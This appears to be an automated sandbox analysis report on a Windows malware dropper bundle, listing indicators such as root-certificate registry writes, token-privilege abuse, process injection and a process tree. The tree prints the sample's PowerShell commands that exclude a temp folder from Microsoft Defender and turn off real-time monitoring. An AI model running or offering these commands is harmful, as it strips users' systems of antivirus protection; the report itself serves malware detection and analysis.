\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe -
Processes:
installer.exeTue0151406c8f0ef2187.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Tue0151406c8f0ef2187.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c0000000100000004000000000800000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Tue0151406c8f0ef2187.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 61 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 130 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 403 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 500 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 508 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SmartClock.exepid process 7044 SmartClock.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exerundll32.exerun.exeTue0164db7e438.tmpWerFault.exeMicrosoftEdge.exeWerFault.exepid process 656 powershell.exe 656 powershell.exe 912 rundll32.exe 912 rundll32.exe 656 912 rundll32.exe 3844 run.exe 3844 run.exe 1968 Tue0164db7e438.tmp 1968 Tue0164db7e438.tmp 3844 run.exe 3844 run.exe 912 rundll32.exe 656 2932 2932 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 3332 WerFault.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2696 MicrosoftEdge.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3060 Explorer.EXE -
Suspicious behavior: MapViewOfSection 20 IoCs
Processes:
xGgxfdTAZIxYAbC9nMWHnOyd.exewscript.exeMZGnU5fdSxCORNKj98rM7R3_.exetY9mbnr7DlvhFnRuAJK8dDk1.exeMicrosoftEdgeCP.exeB16D.exeD35F.exeMicrosoftEdgeCP.exepid process 2932 1860 xGgxfdTAZIxYAbC9nMWHnOyd.exe 1860 xGgxfdTAZIxYAbC9nMWHnOyd.exe 1860 xGgxfdTAZIxYAbC9nMWHnOyd.exe 5128 wscript.exe 5128 wscript.exe 6216 MZGnU5fdSxCORNKj98rM7R3_.exe 7028 tY9mbnr7DlvhFnRuAJK8dDk1.exe 7464 MicrosoftEdgeCP.exe 7464 MicrosoftEdgeCP.exe 7464 MicrosoftEdgeCP.exe 7464 MicrosoftEdgeCP.exe 6260 B16D.exe 8348 D35F.exe 5128 wscript.exe 5128 wscript.exe 3988 MicrosoftEdgeCP.exe 3988 MicrosoftEdgeCP.exe 5128 wscript.exe 5128 wscript.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
1415129.exepid process 5508 1415129.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Tue01fbc1763fd5e9540.exeCalculator Installation.exetaskkill.exepowershell.exepowershell.exetaskkill.exeWerFault.exeBCleanSoft82.exe4.exe5.exeMicrosoftEdge.exeWerFault.exeExplorer.EXEWerFault.exedescription pid process Token: SeCreateTokenPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeAssignPrimaryTokenPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeLockMemoryPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeIncreaseQuotaPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeMachineAccountPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeTcbPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeSecurityPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeTakeOwnershipPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeLoadDriverPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeSystemProfilePrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeSystemtimePrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeProfSingleProcessPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeIncBasePriorityPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeCreatePagefilePrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeCreatePermanentPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeBackupPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeRestorePrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeShutdownPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeDebugPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeAuditPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeSystemEnvironmentPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeChangeNotifyPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeRemoteShutdownPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeUndockPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeSyncAgentPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeEnableDelegationPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeManageVolumePrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeImpersonatePrivilege 2440 Tue01fbc1763fd5e9540.exe Token: SeCreateGlobalPrivilege 2440 Tue01fbc1763fd5e9540.exe Token: 31 2440 Tue01fbc1763fd5e9540.exe Token: 32 2440 Tue01fbc1763fd5e9540.exe Token: 33 2440 Tue01fbc1763fd5e9540.exe Token: 34 2440 Tue01fbc1763fd5e9540.exe Token: 35 2440 Tue01fbc1763fd5e9540.exe Token: SeDebugPrivilege 2392 Calculator Installation.exe Token: SeDebugPrivilege 3504 taskkill.exe Token: SeDebugPrivilege 656 powershell.exe Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 1292 taskkill.exe Token: SeRestorePrivilege 3332 WerFault.exe Token: SeBackupPrivilege 3332 WerFault.exe Token: SeDebugPrivilege 3332 WerFault.exe Token: SeDebugPrivilege 4516 BCleanSoft82.exe Token: SeDebugPrivilege 1520 4.exe Token: SeDebugPrivilege 2688 5.exe Token: SeDebugPrivilege 2696 MicrosoftEdge.exe Token: SeDebugPrivilege 2372 WerFault.exe Token: SeShutdownPrivilege 3060 Explorer.EXE Token: SeCreatePagefilePrivilege 3060 Explorer.EXE Token: SeDebugPrivilege 4508 WerFault.exe Token: SeShutdownPrivilege 3060 Explorer.EXE Token: SeCreatePagefilePrivilege 3060 Explorer.EXE Token: SeShutdownPrivilege 3060 Explorer.EXE Token: SeCreatePagefilePrivilege 3060 Explorer.EXE Token: SeShutdownPrivilege 3060 Explorer.EXE Token: SeCreatePagefilePrivilege 3060 Explorer.EXE Token: SeShutdownPrivilege 3060 Explorer.EXE Token: SeCreatePagefilePrivilege 3060 Explorer.EXE Token: SeShutdownPrivilege 3060 Explorer.EXE Token: SeCreatePagefilePrivilege 3060 Explorer.EXE Token: SeShutdownPrivilege 3060 Explorer.EXE Token: SeCreatePagefilePrivilege 3060 Explorer.EXE Token: SeShutdownPrivilege 3060 Explorer.EXE Token: SeCreatePagefilePrivilege 3060 Explorer.EXE -
Suspicious use of FindShellTrayWindow 47 IoCs
Processes:
Tue01c87a0e667ccf.exerun2.exeTue0164db7e438.tmpExplorer.EXEinstaller.exeCalculator.exepid process 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 1968 Tue0164db7e438.tmp 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 7268 installer.exe 3060 Explorer.EXE 3060 Explorer.EXE 7632 Calculator.exe 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE -
Suspicious use of SendNotifyMessage 43 IoCs
Processes:
Tue01c87a0e667ccf.exerun2.exeExplorer.EXEpid process 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 2680 Tue01c87a0e667ccf.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3936 run2.exe 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE 3060 Explorer.EXE -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
MicrosoftEdge.exemHNJCsmtrK0FHJkzRUTU2mtk.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 2696 MicrosoftEdge.exe 1524 mHNJCsmtrK0FHJkzRUTU2mtk.exe 1524 mHNJCsmtrK0FHJkzRUTU2mtk.exe 2724 MicrosoftEdge.exe 7464 MicrosoftEdgeCP.exe 7464 MicrosoftEdgeCP.exe 7968 MicrosoftEdge.exe 3988 MicrosoftEdgeCP.exe 3988 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.exedescription pid process target process PID 692 wrote to memory of 4024 692 setup_x86_x64_install.exe setup_installer.exe PID 692 wrote to memory of 4024 692 setup_x86_x64_install.exe setup_installer.exe PID 692 wrote to memory of 4024 692 setup_x86_x64_install.exe setup_installer.exe PID 4024 wrote to memory of 4276 4024 setup_installer.exe setup_install.exe PID 4024 wrote to memory of 4276 4024 setup_installer.exe setup_install.exe PID 4024 wrote to memory of 4276 4024 setup_installer.exe setup_install.exe PID 4276 wrote to memory of 4560 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 4560 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 4560 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 2492 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 2492 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 2492 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 3676 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 3676 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 3676 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 2780 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 2780 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 2780 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 4128 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 4128 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 4128 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 420 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 420 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 420 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 584 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 584 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 584 4276 setup_install.exe cmd.exe PID 4560 wrote to memory of 656 4560 cmd.exe powershell.exe PID 4560 wrote to memory of 656 4560 cmd.exe powershell.exe PID 4560 wrote to memory of 656 4560 cmd.exe powershell.exe PID 4276 wrote to memory of 864 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 864 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 864 4276 setup_install.exe cmd.exe PID 2492 wrote to memory of 912 2492 cmd.exe powershell.exe PID 2492 wrote to memory of 912 2492 cmd.exe powershell.exe PID 2492 wrote to memory of 912 2492 cmd.exe powershell.exe PID 3676 wrote to memory of 1108 3676 cmd.exe Tue0190442925.exe PID 3676 wrote to memory of 1108 3676 cmd.exe Tue0190442925.exe PID 3676 wrote to memory of 1108 3676 cmd.exe Tue0190442925.exe PID 4276 wrote to memory of 688 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 688 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 688 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1112 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1112 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1112 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1224 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1224 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1224 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 3136 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 3136 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 3136 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1512 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1512 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1512 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1560 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1560 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1560 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1596 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1596 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1596 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1820 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1820 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1820 4276 setup_install.exe cmd.exe PID 4276 wrote to memory of 1948 4276 setup_install.exe cmd.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer wscript.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\isbsrgcC:\Users\Admin\AppData\Roaming\isbsrgc2⤵
-
C:\Users\Admin\AppData\Roaming\rebsrgcC:\Users\Admin\AppData\Roaming\rebsrgc2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0190442925.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0190442925.exeTue0190442925.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6607⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6767⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6847⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6607⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 8847⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 9567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 10847⤵
